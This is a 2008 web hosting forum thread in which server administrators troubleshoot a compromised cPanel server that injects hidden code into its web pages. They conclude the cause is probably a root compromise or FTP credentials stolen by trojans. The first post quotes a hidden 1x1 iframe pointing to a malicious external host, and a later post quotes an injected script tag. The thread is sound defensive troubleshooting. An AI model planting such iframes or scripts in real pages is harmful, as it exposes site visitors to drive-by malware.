hosted by liquidweb


Go Back   Web Hosting Talk : Web Hosting Main Forums : Hosting Security and Technology : iframe js attack
Reply

Hosting Security and Technology Configuring and optimizing web hosting servers and operating systems, developing administration scripts, building servers, protecting against hackers, and general security (SSL certificates, etc.)
Forum Jump

iframe js attack

Reply Post New Thread In Hosting Security and Technology Subscription
 
Send news tip View All Posts Thread Tools Search this Thread Display Modes
  #1  
Old 04-19-2008, 07:38 PM
sh4ka sh4ka is offline
Web Hosting Evangelist
 
Join Date: Apr 2006
Posts: 464

iframe js attack


Hello,

It seems that one domain at a cpanel server has been inyected with some iframe code... the problem seems to be that we can not find the iframe code anywhere in the public_html directory.

We already scanned the site public_html directory trying to find the js file or something that can launch the iframe but it seems to be impossible to find, also ran clamscanner in the fold without sucess.

I was thinking about some mod_security rule to block iframe js attacks, does anybody know about this?

This is a RHE 4 + cPanel server, any help is appreciated. This is the iframe code:

Code:
iframe width=1 height=1 src='http://x4iomu.wanna.somepills.in/images/enter.php?n2'
Thanks.

Reply With Quote


Sponsored Links
  #2  
Old 04-19-2008, 08:47 PM
ub3r ub3r is offline
Disabled
 
Join Date: Dec 2002
Location: chica go go
Posts: 11,858
Do you run mod_php or phpsuexec?

Reply With Quote
  #3  
Old 04-19-2008, 09:04 PM
1boss1 1boss1 is offline
Web Hosting Master
 
Join Date: Jan 2004
Location: Oztrayla Mate!
Posts: 572
Tell your customer to run comprehensive scans on their PC, and change their login details for FTP.

__________________
Great Host = WiredTree.com Managed VPS Hosting

Reply With Quote
Sponsored Links
  #4  
Old 04-20-2008, 07:42 AM
elmister elmister is offline
Web Hosting Master
 
Join Date: Mar 2004
Posts: 680
I saw this on other server a few hours ago, customer files didn't get modified, and this also happened randomly even with a file with just a phpinfo() line on it. I'm afraid is deeped than a simple script injection

We should share some info about the affected servers, this had Apache 1.3 and PHP 4.4.8

Reply With Quote
  #5  
Old 04-20-2008, 10:51 AM
sh4ka sh4ka is offline
Web Hosting Evangelist
 
Join Date: Apr 2006
Posts: 464
Same here PHP 4.4.8 and Apache 1.3, we also tried to restore weekly backups and the problem stills

Reply With Quote
  #6  
Old 04-20-2008, 12:18 PM
elmister elmister is offline
Web Hosting Master
 
Join Date: Mar 2004
Posts: 680
I have more info, in the phpinfo output, says the following

Quote:
<title>phpinfo()</title><meta name="ROBOTS" content="NOINDEX,NOFOLLOW,NOARCHIVE" /></head>
<body><script language='JavaScript' type='text/javascript' src='hhnkx.js'></script><div class="center">
It inserts a script tag after the boy tag, being this just a phpinfo seems to me that this is being inserted automatically by 'something' in the Apache webserver or the php

Reply With Quote
  #7  
Old 04-20-2008, 12:36 PM
elmister elmister is offline
Web Hosting Master
 
Join Date: Mar 2004
Posts: 680
Quote:
Originally Posted by sh4ka View Post
Same here PHP 4.4.8 and Apache 1.3, we also tried to restore weekly backups and the problem stills
You have a PM from me, btw, are we working on the same server?


Last edited by elmister; 04-20-2008 at 12:39 PM.
Reply With Quote
  #8  
Old 04-20-2008, 04:23 PM
tix3 tix3 is offline
Aspiring Evangelist
 
Join Date: Aug 2007
Location: Greece
Posts: 389
This could be one of the famous random scripts injections.If this is the case you are looking at a root comprmisation problem.
More info is available here

__________________
NOT a webhost!helping here just for the fun of it!
G(r)eek inside.


Reply With Quote
  #9  
Old 04-20-2008, 05:20 PM
elmister elmister is offline
Web Hosting Master
 
Join Date: Mar 2004
Posts: 680
Yes, that's exactly what happens on the box, it was also mentioned on cpanel.net website, according to that, servers were compromised, in this case root was probably achieved because it was using an old kernel that could be exploited

Reply With Quote
  #10  
Old 04-30-2008, 10:16 PM
RodneyB RodneyB is offline
Newbie
 
Join Date: Jun 2005
Location: California, USA
Posts: 10
Is there a fix for this?

Reply With Quote
  #11  
Old 04-30-2008, 10:30 PM
jalapeno55 jalapeno55 is offline
Aspiring Evangelist
 
Join Date: Oct 2005
Posts: 393
Quote:
Originally Posted by RodneyB View Post
Is there a fix for this?
Yea, reinstall the OS.

Reply With Quote
  #12  
Old 05-01-2008, 02:18 AM
InfiniteTech InfiniteTech is offline
Premium Member
 
Join Date: Dec 2006
Location: London, UK
Posts: 1,256
Thats one heck of a fix

__________________

Infinite Technologies
- Dedicated Servers and Virtual Servers. Want more?



Reply With Quote
  #13  
Old 05-13-2008, 07:52 PM
kittykills kittykills is offline
New Member
 
Join Date: May 2008
Location: Brazil
Posts: 1
*

Quote:
Originally Posted by jalapeno55 View Post
Yea, reinstall the OS.
If move to another server, will this be fixed?

Reply With Quote
  #14  
Old 05-14-2008, 07:17 AM
brianoz brianoz is offline
Web Hosting Master
 
Join Date: Nov 2004
Location: Australia
Posts: 1,439
There's been discussion of this elsewhere; one of the most common entry vectors has been through passwords of ftp accounts. What happens is that your PC gets infected with a trojan which then sends them all your passwords. Simply resetting all your passwords isn't enough, you have to do a clean install on your PC as the trojans often aren't recognized by commercial anti-virus software, yet.

Reply With Quote
  #15  
Old 05-15-2008, 12:06 PM
1boss1 1boss1 is offline
Web Hosting Master
 
Join Date: Jan 2004
Location: Oztrayla Mate!
Posts: 572
Exactly as Brian the fellow Aussie said, every time i have encountered this problem it was due to an infected PC sending out the login details. To test this you can try changing your passwords on a different PC, chances are it wont happen again.

__________________
Great Host = WiredTree.com Managed VPS Hosting

Reply With Quote
Reply

Related posts from TheWhir.com
Title Type Date Posted
Web Hosting Talk Message Board Back Online Following DDoS Attack Web Hosting News 2012-09-12 11:59:42
Parallels “Cloud” Summit - It was all about TRUST Blog 2012-03-01 12:29:22
Blogging Site LiveJournal Hit by Ongoing DDoS Attack Web Hosting News 2011-12-08 16:35:38
4Chan Website Back Online After Days of Sustained DDoS Attack Web Hosting News 2011-11-16 15:44:05
Web Host Netregistry Hit by DDoS Attack Web Hosting News 2011-09-26 14:11:33


Thread Tools Search this Thread
Search this Thread:

Advanced Search
Display Modes
Postbit Selector

Posting Rules
You may not post new threads
You may not post replies
You may not post attachments
You may not edit your posts

BB code is On
Smilies are On
[IMG] code is Off
HTML code is Off

Forum Jump
Login:
Log in with your username and password
Username:
Password:



Forgot Password?
Advertisement:
Web Hosting News:



 

X

Welcome to WebHostingTalk.com

Create your username to jump into the discussion!

WebHostingTalk.com is the largest, most influentual web hosting community on the Internet. Join us by filling in the form below.


(4 digit year)

Already a member?